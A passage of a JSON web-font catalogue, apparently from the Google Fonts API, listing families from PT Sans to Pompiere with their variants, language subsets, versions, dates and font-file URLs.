      "family": "PT Sans",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-15",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ptsans/v12/jizaRExUiTo99u79P0WOxOGMMDQ.ttf",
        "italic": "http://fonts.gstatic.com/s/ptsans/v12/jizYRExUiTo99u79D0eEwMOJIDQA-g.ttf",
        "700": "http://fonts.gstatic.com/s/ptsans/v12/jizfRExUiTo99u79B_mh4OmnLD0Z4zM.ttf",
        "700italic": "http://fonts.gstatic.com/s/ptsans/v12/jizdRExUiTo99u79D0e8fOytKB8c8zMrig.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "PT Sans Caption",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ptsanscaption/v13/0FlMVP6Hrxmt7-fsUFhlFXNIlpcqfQXwQy6yxg.ttf",
        "700": "http://fonts.gstatic.com/s/ptsanscaption/v13/0FlJVP6Hrxmt7-fsUFhlFXNIlpcSwSrUSwWuz38Tgg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "PT Sans Narrow",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ptsansnarrow/v12/BngRUXNadjH0qYEzV7ab-oWlsYCByxyKeuDp.ttf",
        "700": "http://fonts.gstatic.com/s/ptsansnarrow/v12/BngSUXNadjH0qYEzV7ab-oWlsbg95DiCUfzgRd-3.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "PT Serif",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ptserif/v12/EJRVQgYoZZY2vCFuvDFRxL6ddjb-.ttf",
        "italic": "http://fonts.gstatic.com/s/ptserif/v12/EJRTQgYoZZY2vCFuvAFTzrq_cyb-vco.ttf",
        "700": "http://fonts.gstatic.com/s/ptserif/v12/EJRSQgYoZZY2vCFuvAnt65qVXSr3pNNB.ttf",
        "700italic": "http://fonts.gstatic.com/s/ptserif/v12/EJRQQgYoZZY2vCFuvAFT9gaQVy7VocNB6Iw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "PT Serif Caption",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ptserifcaption/v12/ieVl2ZhbGCW-JoW6S34pSDpqYKU059WxDCs5cvI.ttf",
        "italic": "http://fonts.gstatic.com/s/ptserifcaption/v12/ieVj2ZhbGCW-JoW6S34pSDpqYKU019e7CAk8YvJEeg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pacifico",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v17",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pacifico/v17/FwZY7-Qmy14u9lezJ96A4sijpFu_.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Padauk",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "myanmar"
      ],
      "version": "v7",
      "lastModified": "2020-11-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/padauk/v7/RrQRboJg-id7OnbBa0_g3LlYbg.ttf",
        "700": "http://fonts.gstatic.com/s/padauk/v7/RrQSboJg-id7Onb512DE1JJEZ4YwGg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Palanquin",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/palanquin/v6/9XUhlJ90n1fBFg7ceXwUEltI7rWmZzTH.ttf",
        "200": "http://fonts.gstatic.com/s/palanquin/v6/9XUilJ90n1fBFg7ceXwUvnpoxJuqbi3ezg.ttf",
        "300": "http://fonts.gstatic.com/s/palanquin/v6/9XUilJ90n1fBFg7ceXwU2nloxJuqbi3ezg.ttf",
        "regular": "http://fonts.gstatic.com/s/palanquin/v6/9XUnlJ90n1fBFg7ceXwsdlFMzLC2Zw.ttf",
        "500": "http://fonts.gstatic.com/s/palanquin/v6/9XUilJ90n1fBFg7ceXwUgnhoxJuqbi3ezg.ttf",
        "600": "http://fonts.gstatic.com/s/palanquin/v6/9XUilJ90n1fBFg7ceXwUrn9oxJuqbi3ezg.ttf",
        "700": "http://fonts.gstatic.com/s/palanquin/v6/9XUilJ90n1fBFg7ceXwUyn5oxJuqbi3ezg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Palanquin Dark",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/palanquindark/v7/xn75YHgl1nqmANMB-26xC7yuF_6OTEo9VtfE.ttf",
        "500": "http://fonts.gstatic.com/s/palanquindark/v7/xn76YHgl1nqmANMB-26xC7yuF8Z6ZW41fcvN2KT4.ttf",
        "600": "http://fonts.gstatic.com/s/palanquindark/v7/xn76YHgl1nqmANMB-26xC7yuF8ZWYm41fcvN2KT4.ttf",
        "700": "http://fonts.gstatic.com/s/palanquindark/v7/xn76YHgl1nqmANMB-26xC7yuF8YyY241fcvN2KT4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pangolin",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pangolin/v6/cY9GfjGcW0FPpi-tWPfK5d3aiLBG.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Paprika",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/paprika/v8/8QIJdijZitv49rDfuIgOq7jkAOw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Parisienne",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/parisienne/v8/E21i_d3kivvAkxhLEVZpcy96DuKuavM.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Passero One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/passeroone/v12/JTUTjIko8DOq5FeaeEAjgE5B5Arr-s50.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Passion One",
      "variants": [
        "regular",
        "700",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/passionone/v11/PbynFmL8HhTPqbjUzux3JHuW_Frg6YoV.ttf",
        "700": "http://fonts.gstatic.com/s/passionone/v11/Pby6FmL8HhTPqbjUzux3JEMq037owpYcuH8y.ttf",
        "900": "http://fonts.gstatic.com/s/passionone/v11/Pby6FmL8HhTPqbjUzux3JEMS0X7owpYcuH8y.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pathway Gothic One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pathwaygothicone/v9/MwQrbgD32-KAvjkYGNUUxAtW7pEBwx-dTFxeb80flQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Patrick Hand",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/patrickhand/v14/LDI1apSQOAYtSuYWp8ZhfYeMWcjKm7sp8g.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Patrick Hand SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/patrickhandsc/v8/0nkwC9f7MfsBiWcLtY65AWDK873ViSi6JQc7Vg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pattaya",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pattaya/v6/ea8ZadcqV_zkHY-XNdCn92ZEmVs.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Patua One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/patuaone/v11/ZXuke1cDvLCKLDcimxBI5PNvNA9LuA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pavanam",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "tamil"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pavanam/v5/BXRrvF_aiezLh0xPDOtQ9Wf0QcE.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Paytone One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/paytoneone/v13/0nksC9P7MfYHj2oFtYm2CiTqivr9iBq_.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Peddana",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/peddana/v8/aFTU7PBhaX89UcKWhh2aBYyMcKw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Peralta",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/peralta/v8/hYkJPu0-RP_9d3kRGxAhrv956B8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Permanent Marker",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/permanentmarker/v10/Fh4uPib9Iyv2ucM6pGQMWimMp004HaqIfrT5nlk.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Petit Formal Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/petitformalscript/v8/B50TF6xQr2TXJBnGOFME6u5OR83oRP5qoHnqP4gZSiE.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Petrona",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v11",
      "lastModified": "2020-09-29",
      "files": {
        "100": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6NsARBH452Mvds.ttf",
        "200": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4NsQRBH452Mvds.ttf",
        "300": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk7TsQRBH452Mvds.ttf",
        "regular": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6NsQRBH452Mvds.ttf",
        "500": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6_sQRBH452Mvds.ttf",
        "600": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk5TtgRBH452Mvds.ttf",
        "700": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk5qtgRBH452Mvds.ttf",
        "800": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4NtgRBH452Mvds.ttf",
        "900": "http://fonts.gstatic.com/s/petrona/v11/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4ktgRBH452Mvds.ttf",
        "100italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8uwDFYpUN-dsIWs.ttf",
        "200italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8mwCFYpUN-dsIWs.ttf",
        "300italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8rICFYpUN-dsIWs.ttf",
        "italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8uwCFYpUN-dsIWs.ttf",
        "500italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8t4CFYpUN-dsIWs.ttf",
        "600italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8jIFFYpUN-dsIWs.ttf",
        "700italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8gsFFYpUN-dsIWs.ttf",
        "800italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8mwFFYpUN-dsIWs.ttf",
        "900italic": "http://fonts.gstatic.com/s/petrona/v11/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8kUFFYpUN-dsIWs.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Philosopher",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "vietnamese"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/philosopher/v14/vEFV2_5QCwIS4_Dhez5jcVBpRUwU08qe.ttf",
        "italic": "http://fonts.gstatic.com/s/philosopher/v14/vEFX2_5QCwIS4_Dhez5jcWBrT0g21tqeR7c.ttf",
        "700": "http://fonts.gstatic.com/s/philosopher/v14/vEFI2_5QCwIS4_Dhez5jcWjVamgc-NaXXq7H.ttf",
        "700italic": "http://fonts.gstatic.com/s/philosopher/v14/vEFK2_5QCwIS4_Dhez5jcWBrd_QZ8tK1W77HtMo.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Piazzolla",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-10-08",
      "files": {
        "100": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LYx3Ly1AHfAAy5.ttf",
        "200": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JYxnLy1AHfAAy5.ttf",
        "300": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7KGxnLy1AHfAAy5.ttf",
        "regular": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LYxnLy1AHfAAy5.ttf",
        "500": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LqxnLy1AHfAAy5.ttf",
        "600": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7IGwXLy1AHfAAy5.ttf",
        "700": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7I_wXLy1AHfAAy5.ttf",
        "800": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JYwXLy1AHfAAy5.ttf",
        "900": "http://fonts.gstatic.com/s/piazzolla/v3/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JxwXLy1AHfAAy5.ttf",
        "100italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhZqw3gX9BRy5m5M.ttf",
        "200italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhRqx3gX9BRy5m5M.ttf",
        "300italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhcSx3gX9BRy5m5M.ttf",
        "italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhZqx3gX9BRy5m5M.ttf",
        "500italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhaix3gX9BRy5m5M.ttf",
        "600italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhUS23gX9BRy5m5M.ttf",
        "700italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhX223gX9BRy5m5M.ttf",
        "800italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhRq23gX9BRy5m5M.ttf",
        "900italic": "http://fonts.gstatic.com/s/piazzolla/v3/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhTO23gX9BRy5m5M.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Piedra",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/piedra/v9/ke8kOg8aN0Bn7hTunEyHN_M3gA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pinyon Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pinyonscript/v11/6xKpdSJbL9-e9LuoeQiDRQR8aOLQO4bhiDY.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pirata One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pirataone/v9/I_urMpiDvgLdLh0fAtoftiiEr5_BdZ8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Plaster",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/plaster/v12/DdTm79QatW80eRh4Ei5JOtLOeLI.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Play",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/play/v12/6aez4K2oVqwIjtI8Hp8Tx3A.ttf",
        "700": "http://fonts.gstatic.com/s/play/v12/6ae84K2oVqwItm4TOpc423nTJTM.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Playball",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/playball/v10/TK3gWksYAxQ7jbsKcj8Dl-tPKo2t.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Playfair Display",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v21",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKdFvUDQZNLo_U2r.ttf",
        "500": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKd3vUDQZNLo_U2r.ttf",
        "600": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKebukDQZNLo_U2r.ttf",
        "700": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKeiukDQZNLo_U2r.ttf",
        "800": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfFukDQZNLo_U2r.ttf",
        "900": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsukDQZNLo_U2r.ttf",
        "italic": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTbtbK-F2rA0s.ttf",
        "500italic": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_pqTbtbK-F2rA0s.ttf",
        "600italic": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_naUbtbK-F2rA0s.ttf",
        "700italic": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_k-UbtbK-F2rA0s.ttf",
        "800italic": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_iiUbtbK-F2rA0s.ttf",
        "900italic": "http://fonts.gstatic.com/s/playfairdisplay/v21/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_gGUbtbK-F2rA0s.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Playfair Display SC",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/playfairdisplaysc/v10/ke85OhoaMkR6-hSn7kbHVoFf7ZfgMPr_pb4GEcM2M4s.ttf",
        "italic": "http://fonts.gstatic.com/s/playfairdisplaysc/v10/ke87OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbwMFeEzI4sNKg.ttf",
        "700": "http://fonts.gstatic.com/s/playfairdisplaysc/v10/ke80OhoaMkR6-hSn7kbHVoFf7ZfgMPr_nQIpNcsdL4IUMyE.ttf",
        "700italic": "http://fonts.gstatic.com/s/playfairdisplaysc/v10/ke82OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbw0qc4XK6ARIyH5IA.ttf",
        "900": "http://fonts.gstatic.com/s/playfairdisplaysc/v10/ke80OhoaMkR6-hSn7kbHVoFf7ZfgMPr_nTorNcsdL4IUMyE.ttf",
        "900italic": "http://fonts.gstatic.com/s/playfairdisplaysc/v10/ke82OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbw0kcwXK6ARIyH5IA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Podkova",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v17",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/podkova/v17/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWtFzcU4EoporSHH.ttf",
        "500": "http://fonts.gstatic.com/s/podkova/v17/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWt3zcU4EoporSHH.ttf",
        "600": "http://fonts.gstatic.com/s/podkova/v17/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWubysU4EoporSHH.ttf",
        "700": "http://fonts.gstatic.com/s/podkova/v17/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWuiysU4EoporSHH.ttf",
        "800": "http://fonts.gstatic.com/s/podkova/v17/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWvFysU4EoporSHH.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Poiret One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/poiretone/v9/UqyVK80NJXN4zfRgbdfbk5lWVscxdKE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Poller One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pollerone/v10/ahccv82n0TN3gia5E4Bud-lbgUS5u0s.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Poly",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/poly/v11/MQpb-W6wKNitRLCAq2Lpris.ttf",
        "italic": "http://fonts.gstatic.com/s/poly/v11/MQpV-W6wKNitdLKKr0DsviuGWA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pompiere",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
